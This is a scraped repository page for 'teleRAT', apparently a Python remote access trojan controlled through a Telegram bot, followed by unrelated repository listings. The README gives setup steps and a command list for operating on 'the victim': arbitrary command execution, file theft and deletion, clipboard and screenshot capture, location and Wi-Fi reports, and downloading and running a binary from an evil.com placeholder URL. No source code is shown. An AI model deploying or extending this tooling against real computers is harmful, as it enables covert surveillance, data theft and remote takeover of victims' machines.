Telegram RAT written in Python

Related tags

Third-party APIs Wrapperspythonmalwareratmalware-researchremote-admin-tool
Overview

teleRAT

Python based RAT that uses Telegram for sending commands and receiving data to and from a victim computer.

Setup.py

  1. Insert your API key into the api variable inside the setup.py script & run it. This will setup your Telegram chat with your created bot with the necessary commands to avoid inserting each command along with the help message.
  • Read here to create your own bot and obtain your API token.
  1. Install necessary requirements: pip install -r requirements.txt
  2. Send a command to your Telegram bot
  3. Run python3 main.py

Available Commands

  • /whoami - returns username. no additional arguments required.
  • /screenshot - takes screenshots. requires the number of screenshots to take (EX: /screenshot 5 <- to take 5 screenshots)
  • /location - returns location info (region, state, zip code, estimated coordinates, timezone, country, ip address)
  • /metadata - returns metadata info about a specified file. requires filepath as an additional argument (EX: /metadata C:\Users\Username\Files\special.java <- will return metadata info about special.java)
  • /execute - executes specified system command. requires 2 additional arguments: the system command and additional arguments to pass to that system command (EX: /execute cmd.exe [/c,ver] or /execute binary.exe none} in order to execute binary.exe with no arguments)
  • /power - allows operator to shutoff, hibernate, or restart computer. requires 1 additional argument: hibernate, pd (to power down), or restart (EX: /power pd <- to power down the victim's computer)
  • /ls - provides operator with directory listing. If no additional argument is provided, it provides directory listing for directory in which malware is. Additional argument of a directory is optional (EX: /ls %APPDATA% <- provides directory listing for APPDATA directory)
  • /delete - deletes a user specified file. Additional argument of filepath is required (EX: /delete C:\Users\Username\Files\temp.txt <- deletes a file named temp.txt)
  • /wreport - provides information regarding the wireless profiles the computer has connected to in the past, the drivers, and a list of wireless interfaces.
  • /remotebinary - download and execute a remote binary. Requires 2 additional arguments: the URL where the binary is and any additional arguments to pass when executing the binary (EX: /remotebinary https://evil.com/file.exe noargs <- execute file.exe with no arguments or /remotebinary https://evil.com/file.exe [-c,-f] <- to execute file.exe with flags c & f)
  • /processes - returns a list of running processes and services
  • /gather - return a specified file. requires 1 additional argument: the filepath (EX: /gather C:\Users\username\important\file.xlsx <- grab and upload file.xlsx to Telegram chat)
  • /report - provides a hardware report & Windows version to operator
  • /playnoise - plays a user specified noise. available list of noises include: asterisk sound (asterisk), exclamation sound (exclamation), exit sound (exit), hand sound (hand), question sound (question), and beep (beep) (EX: /playnoise beep or /playnoise question)
  • /gatherclip - returns data currently copied in the victim's clipboard. requires no additional arguments.
  • /messagebox - will present the victim with a message box. 2 additional arguments are required: caption and title for the window (EX: /messagebox </li> </ul> </article> </div> </div> </div> <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js" type="3463953c43b18c592a02463e-text/javascript"></script> <ins class="adsbygoogle" style="display:block" data-ad-format="autorelaxed" data-ad-client="ca-pub-2693323733590204" data-ad-slot="1585190487"></ins> <script type="3463953c43b18c592a02463e-text/javascript">(adsbygoogle = window.adsbygoogle || []).push({});</script> </div> <div class="col-lg-4 right"> <div id="basic" class="tab-pane fade show active"> <div class="box shadow-sm rounded bg-white mb-3"> <div class="box-title border-bottom p-3"> <h6 class="m-0">Owner</h6> </div> <div class="d-flex align-items-center p-3 job-item-header"> <div class="overflow-hidden mr-2"> <h6 class="font-weight-bold -dark mb-0 text-truncate"> </h6> <div class="small text-gray-500"> </div> </div> <img class="img-fluid ml-auto" style="border-radius: 50%;" src="https://avatars.githubusercontent.com/u/56985822?v=4&s=60" alt=""> </div> <div class="box-body p-3"> <a href="/repo/gitHubRepo/1d8-teleRAT-python-third-party-apis-wrappers" rel="nofollow" target="_blank" class="btn btn-lg btn-block btn-danger mb-3"><i class="fa fa-github" aria-hidden="true"></i> GitHub Repository</a> </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/SkullCrusher0003-paginator"><h6 class="font-weight-bold ">Pagination for your discord.py bot using the discord_components library!</h6></a> <p class="mb-0 text-muted"> Paginator - discord_components This repository is just an example code for how to carry out pagination using the discord_components library for python</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/77442248?v=4&s=60" alt="Skull Crusher"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 9 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Jan 31, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/TON-Pool-miner"><h6 class="font-weight-bold ">TON Miner from TON-Pool.com</h6></a> <p class="mb-0 text-muted"> TON-Pool Miner Miner from TON-Pool.com </p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/95704307?v=4&s=60" alt=""> <i class="fa fa-star ml-3" aria-hidden="true"></i> 21 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Nov 18, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/Code-X-Mania-rename-bot-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">A better rename and convert bot with upload mode option and Auto detection</h6></a> <p class="mb-0 text-muted"> A better rename and convert bot with upload mode option and Auto detection</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/88939380?v=4&s=60" alt="Code X Mania"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 2 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Nov 09, 2021 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/sameerkumar18-pyaztro"><h6 class="font-weight-bold ">Python Wrapper for aztro - The Astrology API | Get Daily Horoscope πŸ’«</h6></a> <p class="mb-0 text-muted"> PyAztro PyAztro is a client library for aztro written in Python. aztro provides horoscope info for sun signs such as Lucky Number, Lucky Color, Mood, </p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/15978864?v=4&s=60" alt="Sameer Kumar"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 30 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Jan 08, 2023 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/sony-nnabla-rl"><h6 class="font-weight-bold ">Deep reinforcement learning library built on top of Neural Network Libraries</h6></a> <p class="mb-0 text-muted"> Deep Reinforcement Learning Library built on top of Neural Network Libraries NNablaRL is a deep reinforcement learning library built on top of Neural </p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/8435219?v=4&s=60" alt="Sony"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 100 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Dec 14, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/Qwerty-Space-AntiDeletedAccountsBot-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">Automatically kick deleted accounts</h6></a> <p class="mb-0 text-muted"> AntiDeletedAccountsBot (ADAB) Automatically kick deleted accounts Based on uniborg, a pluggable asyncio Telegram userbot based on Telethon. Installati</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/6967592?v=4&s=60" alt="Qwerty-Space"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 34 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Jan 02, 2023 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/RPSMain-orca-py"><h6 class="font-weight-bold ">A continued fork of Disco</h6></a> <p class="mb-0 text-muted"> Orca Orca is an extensive and extendable Python 3.x library for the Discord API. orca boasts the following major features: Expressive, functional inte</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/82736662?v=4&s=60" alt="RPS"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 4 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Apr 03, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/wordnik-wordnik-python-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">Wordnik Python public library</h6></a> <p class="mb-0 text-muted"> Python 2.7 client for Wordnik.com API Overview This is a Python 2.7 client for the Wordnik.com v4 API. For more information, see http://developer.word</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/118978?v=4&s=60" alt="Wordnik"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 224 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Dec 29, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/arkhon7-risa-bot"><h6 class="font-weight-bold ">A discord bot that will help you browse/download nhentai sources.</h6></a> <p class="mb-0 text-muted"> Risa Introduction Risa is an nHentai discord bot that will help you browse and download your favorite doujin inside your own discord server. Hosting M</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/81824826?v=4&s=60" alt="markee7"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 14 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Oct 25, 2021 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/developmentseed-titiler-digitaltwin"><h6 class="font-weight-bold ">A demo titiler for Sentinel 2 Digital Twin dataset</h6></a> <p class="mb-0 text-muted"> This is a DEMO custom api built on top of TiTiler to create Web Map Tiles from the Digital Twin Sentinel-2 COG created by Sinergise</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/92384?v=4&s=60" alt="Development Seed"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 26 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> May 21, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/MarshalX-telegram-crawler"><h6 class="font-weight-bold ">Automatically detect changes made to the official Telegram sites.</h6></a> <p class="mb-0 text-muted"> πŸ•· Telegram Web Crawler This project is developed to automatically detect changes made to the official Telegram sites. This is necessary for anticipat</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/15520314?v=4&s=60" alt="Il'ya"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 115 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Dec 31, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/MOHITXPANDIT-Yuichixspam"><h6 class="font-weight-bold ">Yuichixspam - TLEEGRAM SPAM BOT For Python</h6></a> <p class="mb-0 text-muted"> 𝒀𝑼𝑰π‘ͺ𝑯𝑰 ✘ 𝑺𝑷𝑨𝑴 π‘©π‘Άπ‘»γƒŽ πŸš€ Deploy on Heroku (https://heroku.com/deploy?t</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/87252563?v=4&s=60" alt="MOHIT X PANDIT"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 6 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Jan 30, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/Wahyu213-vladilena-mirize"><h6 class="font-weight-bold ">Vladilena Mirize Music - Bot Music Telegram By @zenfrans</h6></a> <p class="mb-0 text-muted"> Vladilena Mirize Music - Bot Music Telegram By @zenfrans</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/91831925?v=4&s=60" alt="Wahyusaputra"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 3 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Feb 12, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/Sinan-M-116-DATE_TIME_USERBOT-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">Date Time Userbot With Python</h6></a> <p class="mb-0 text-muted"> DATE_TIME_USERBOT An Telegram Bot By @Pythone_3 Config Vars API_ID : Telegram API_ID, get it from my.telegram.org/apps API_HASH : Telegram API_ID, get</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/86185826?v=4&s=60" alt="Sinzz-sinan-m"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 2 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Oct 20, 2021 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/dracarys18-Kernel_Tracker"><h6 class="font-weight-bold ">A Bot to Track Kernel Upstreams from kernel.org and Post it on Telegram Channel</h6></a> <p class="mb-0 text-muted"> Channel Kernel Tracker is the channel where the bot will be sending the updates in. Introduction This is a Telegram Bot to Track Kernel Upstreams kern</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/43412619?v=4&s=60" alt="Kartikeya Hegde"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 3 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Oct 05, 2021 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/StarkBotsIndustries-pystark"><h6 class="font-weight-bold ">An incomplete add-on extension to Pyrogram, to create telegram bots a bit more easily</h6></a> <p class="mb-0 text-muted"> PyStark A star ⭐ from you means a lot An incomplete add-on extension to Pyrogram</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/88478059?v=4&s=60" alt="Stark Bots"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 36 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Dec 23, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/robertjkeck2-notiongate"><h6 class="font-weight-bold ">Token-gate Notion pages</h6></a> <p class="mb-0 text-muted"> This is a Next.js project bootstrapped with create-next-app. Getting Started First, run the development server: npm run dev # or yarn dev Open http://</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/18727700?v=4&s=60" alt="John"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 8 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Oct 13, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/knowsuchagency-orkestra-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">The elegance of Airflow + the power of AWS</h6></a> <p class="mb-0 text-muted"> Orkestra The elegance of Airflow + the power of AWS </p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/11974795?v=4&s=60" alt="Stephan Fitzpatrick"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 42 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Nov 01, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/Anon-Exploiter-sast-dast-python-third-party-apis-wrappers"><h6 class="font-weight-bold "> Implement SAST + DAST through Github actions</h6></a> <p class="mb-0 text-muted"> Implement SAST + DAST through Github actions The repository is supposed to implement SAST+DAST checks using github actions against a vulnerable python</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/18597330?v=4&s=60" alt="Syed Umar Arfeen"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 3 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Nov 09, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/HETHAT-aladhan-py"><h6 class="font-weight-bold ">Pythonic wrapper for the Aladhan prayer times API.</h6></a> <p class="mb-0 text-muted"> aladhan.py is a pythonic wrapper for the Aladhan prayer times API. Installation Python 3.6 or higher is required. To Install aladhan.py with pip: pip </p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/64673082?v=4&s=60" alt="HETHAT"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 8 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Aug 17, 2022 </div> </div> </div> </div> </div> </div> <footer class="bg-white"> <div class="container"> <div class="copyright"> <div class="logo"> <a href="/"> <img src="/assets/images/logo_pythonrepo.png"> </a> </div> <p>2022.PythonRepo </p> <ul class="social"> <li> <a href="/about">About</a>   </li> <li> <a href="/contact">Contact Us</a>   </li> <li> <a href="/dmca">DMCA</a>   </li> <li> <a href="/disclaimer">Disclaimer</a>   </li> <li> <a href="/privacypolicy">Privacy Policy</a>   </li> </ul> </div> </div> </footer> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js" integrity="sha512-bnIvzh6FU75ZKxp0GXLH9bewza/OIw6dLVh9ICg0gogclmYGguQJWl8U30WpbsGTqbIiAwxTsbe76DErLq5EDQ==" crossorigin="anonymous" type="3463953c43b18c592a02463e-text/javascript"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.5.0/js/bootstrap.bundle.min.js" integrity="sha512-Oy5BruJdE3gP9+LMJ11kC5nErkh3p4Y0GawT1Jrcez4RTDxODf3M/KP3pEsgeOYxWejqy2SPnj+QMpgtvhDciQ==" crossorigin="anonymous" type="3463953c43b18c592a02463e-text/javascript"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/select2/4.0.13/js/select2.min.js" integrity="sha512-2ImtlRlf2VVmiGZsjm9bEyhjGW4dU7B6TNwh/hx/iSByxNENtj3WVE6o/9Lj4TJeVXPi4bnOIMXFIJJAeufa0A==" crossorigin="anonymous" type="3463953c43b18c592a02463e-text/javascript"></script> <script src="/assets/js/custom.js" type="3463953c43b18c592a02463e-text/javascript"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.lazyload/1.9.1/jquery.lazyload.min.js" type="3463953c43b18c592a02463e-text/javascript"></script> <script type="3463953c43b18c592a02463e-text/javascript"> $(function() { $("img.lazy").lazyload({ threshold :180, failurelimit :20, effect : "fadeIn" }); }); </script> <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/10.5.0/highlight.min.js" type="3463953c43b18c592a02463e-text/javascript"></script> <script type="3463953c43b18c592a02463e-text/javascript"> hljs.initHighlightingOnLoad(); </script> <script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="3463953c43b18c592a02463e-|49" defer=""></script> <script src="/static/js/jquery-3.6.0.min.js" type="text/javascript"></script> <script src="/adview_pic_cpc_cpm_cpa_guanggao_gg_ads_300x250.js?v=1757738997" type="text/javascript"></script> </body> </html>